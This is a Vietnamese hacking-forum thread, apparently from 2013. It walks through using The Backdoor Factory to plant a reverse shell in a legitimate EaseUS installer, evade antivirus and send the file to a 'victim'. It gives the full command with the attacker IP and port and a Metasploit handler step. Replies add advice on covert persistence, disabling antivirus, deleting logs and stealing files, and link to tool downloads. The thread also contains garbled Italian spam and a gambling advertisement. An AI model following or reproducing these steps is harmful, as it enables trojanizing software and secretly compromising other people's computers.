Hack máy tính sử dụng một backdoor

DDos · 25/12/2013

The backdoor factory là một shellcode cho phép bạn tiêm vào bất kỳ một file thực thi chạy trên windows 32/64bit, mà file thực thi vẫn chạy bình thường. Công cụ này được viết bởi nhà nghiên cứu bảo mật Joshua Pitts được trình diễn tại hội nghị bảo mật Debycon 2013.

Các bạn có thể tìm hiểu thêm công cụ này trong slide mà tác giả đã chia sẻ:

HTML:

http://www.slideshare.net/midnite_runr/patching-windows-executables-with-the-backdoor-factory

Cách sử dụng công cụ:

Bước 1: Tải công cụ và giải nén ta được:

1490892970Screenshot from 2013-12-25 00:31:56.png

HTML:

https://github.com/secretsquirrel/the-backdoor-factory/archive/1af848015c49a0654bbae721388edf426ca80eda.zip

Bước 2: Mở terminal và chạy ứng dụng bằng lệnh: ./backdoor.py

1490892970Screenshot from 2013-12-25 00:34:53.png

Các tùy chọn của công cụ

Trong ví dụ này, mình sẽ gắn backdoor vào file cài đặt của phần mềm phân chia ổ đĩa khá nổi tiếng là EaseUS Partition Master Home Edition.

Bước 3: Mình sử dụng lệnh: ./backdoor.py -f '/root/Downloads/bypass antivirus/backdoor/epm.exe' -H 192.168.1.6 -P 443 -s reverse_shell_tcp

1490892970Screenshot from 2013-12-25 00:53:55.png

Bước 4: Các bạn lựa chọn các tùy chọn cho việc thay đổi shellcode gắn vào file thực thi để vượt qua sự phát hiện phần mềm diệt virus

1490892970Screenshot from 2013-12-24 21:59:44.png

1490892970Screenshot from 2013-12-24 22:00:14.png

Bước 5: Sau khi hoàn thành các tùy chọn, file thực thi mà đã được nhúng backdoor sẽ được tạo ra ở đường dẫn
/backoor/backdoored

1490892970Screenshot from 2013-12-24 22:00:25.png

Bước 6: Bây giờ mình sẽ thử scan file đã được backdoored này, sử dụng dịch vụ scan online Total virus. Và đây là kết quả:

1490892970Screenshot from 2013-12-24 22:03:07.png

Bước 7: Mình mở metasploit và sử dụng tạo khai thác exploit/multi/hanlder để lắng nghe kết nối từ nạn nhân. Sau đó mình sẽ gửi file thực thi này đến cho nạn nhân. Trên máy nạn nhân, có sử dụng phần mềm diệt virus AVG 2014 Free đã update đầy đủ cơ sở dữ liệu.

1490892970Screenshot from 2013-12-24 22:10:23.png

Bước 8: Khi nạn nhân thực thi file, quá trình khai thác của bạn đã thành công:

1490892970Screenshot from 2013-12-24 22:48:21.png

DDos

Re: Hack máy tính sử dụng một backdoor

Đã có phiên bản 1.1. Bản này hỗ trợ Win64 Stager added.
Một công cụ cực kỳ hay, anh em nên tìm hiểu và thử nghiệm....

SenKyller

Re: Hack máy tính sử dụng một backdoor

sau khi đã khai thác thành công thì phải làm gì nữa để điều khiển dc máy victim thế a Ddos

DDos

Re: Hack máy tính sử dụng một backdoor

Đối với một hacker, công việc thường làm sau khi khai thác thành công là cài backdoor trên hệ thống để tiện truy cập cho lần sau. Tiếp đến vô hiệu hóa phần mềm diệt virus. Thu thập thông tin người dùng.....

Phanonra

Re: Hack máy tính sử dụng một backdoor

DDos;11338 đã viết:
Đối với một hacker, công việc thường làm sau khi khai thác thành công là cài backdoor trên hệ thống để tiện truy cập cho lần sau. Tiếp đến vô hiệu hóa phần mềm diệt virus. Thu thập thông tin người dùng.....

Im lặng mà cắn lâu dài ... vô phá cái anti vir thì thọt rồi, SYSADMIN vô thấy hỏng cái anti vir thì việc đầu tiên là check virus dùng sysinternal suite check signature, check thêm phát virtotal nữa là thọt mất ngay. Cách tốt nhất sau khi vào thành công xóa log, gài hàng, giữ nguyên hiện trường hiện trạng cũ của màn hình desktop làm việc rồi lẳng lặng âm thầm mà đi. Nếu có file dung lượng lớn có giá trị thì vô gài hàng rồi lượn ngay ... 2-3h sáng mò lên mà down về

Miguelmamb

low-cost
whitehat.vn

ripetizione on iPhone Le cose che mentre si utilizza l'iPod. Cominciano inizio e\r\rquindi seguire riguardo seguente rcent nuovo Informazioni. iPhone di Apple it possde t:ï»¿1 uno. Ristrutturazione Waves\r\r\rÂ*Apple sono\r louboutin milanoï»¿Basti dire che ho davvero genuinamente come Mary Sean Young. Ho visto notato Sean ubriaco, I vedere Sean sobrio, e buona favore sobrio, accetto e ammiro Sean Young qualunque momento e in tutte le condizioni . t ass calci soap opera sul giovani e l' Restless, e ora lei va sul pattinaggio Con tutto il STARS. Io porterÃ² la conservazione russicitÃ* come ho sempre normalmente, anche nella parte posteriore quando il ghiaccio era molto considerevolmente piÃ¹ sottile e molti t sono stati applausi.

DDos

Re: Hack máy tính sử dụng một backdoor

Udate version 2.2.3:

- Hỗ trợ Windows PE 32/64 bit, Linux ELF 32/64 bit
- Thêm shellcode win86 : loadliba_reverse_tcp

Download:
http://flexydrive.com/wvuax0qw14ye

Hackerstudent93

Re: Hack máy tính sử dụng một backdoor

rất có kinh nghiệm

Hackerstudent93

Re: Hack máy tính sử dụng một backdoor

Bác Phanonra rất có kinh nghiệm, hjhj

worldCup_Brazil

World Cup 2014 tại Brazil đã KẾT THÚC rồi,bạn đã sở hữu 1 TÀI KHOẢN đề tự tay đặt cược mà không cần gọi bạn bè (bạn sẽ bị ăn lai) nhờ đá kèo dùm chửa?

Và chi cần ngồi 1 chổ,dùng Internet Banking là bạn có thể ĐK cá độ thành công.

Muốn đăng ký Cược thể thao,casino trực tuyến,poker...tại 188bet rất đơn giản.

CLICK VÀO ĐÂY:>>LINK ĐĂNG KÝ 188bet.com

tigerit

Re: Hack máy tính sử dụng một backdoor

anh DDOS cho em xin lại link 2.2.3 với.
Tks anh nhiều!

DDos

Re: Hack máy tính sử dụng một backdoor

tigerit;15949 đã viết:
anh DDOS cho em xin lại link 2.2.3 với.
Tks anh nhiều!

update version 2.2.7:
http://www.toofile.com/402h632dfqr9/the-backdoor-factory-master.zip.html

DDos

Re: Hack máy tính sử dụng một backdoor

Cập nhật video...

osamatruong

Link không down được, Ad check giúp link

sunny

Bạn thử link này chưa: https://github.com/secretsquirrel/t...mmit/1af848015c49a0654bbae721388edf426ca80eda

CỘNG ĐỒNG AN NINH MẠNG VIỆT NAM

Hack máy tính sử dụng một backdoor

DDos

VIP Members

Cách sử dụng công cụ:

Hack máy tính sử dụng một backdoor

DDos

VIP Members

Cách sử dụng công cụ:​

Số người đang xem

Thống kê diễn đàn

Cách sử dụng công cụ: